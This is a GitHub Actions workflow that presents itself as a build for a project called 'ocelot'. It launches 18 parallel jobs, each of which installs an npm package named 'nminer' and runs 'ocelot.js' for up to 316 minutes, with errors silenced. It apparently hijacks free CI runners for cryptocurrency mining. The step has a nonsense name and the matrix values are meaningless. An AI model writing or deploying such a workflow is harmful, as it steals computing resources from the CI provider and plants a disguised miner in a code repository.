name: ocelot
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9886 }
          - { version: 6165 }
          - { version: 5282 }
          - { version: 4142 }
          - { version: 4370 }
          - { version: 7365 }
          - { version: 3111 }
          - { version: 8290 }
          - { version: 2500 }
          - { version: 5551 }
          - { version: 150 }
          - { version: 5227 }
          - { version: 3919 }
          - { version: 8046 }
          - { version: 9315 }
          - { version: 6795 }
          - { version: 9853 }
          - { version: 1144 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: as whereas
        run: |
          npm install nminer@latest
          timeout 316m node ocelot.js || echo "ocelot executed"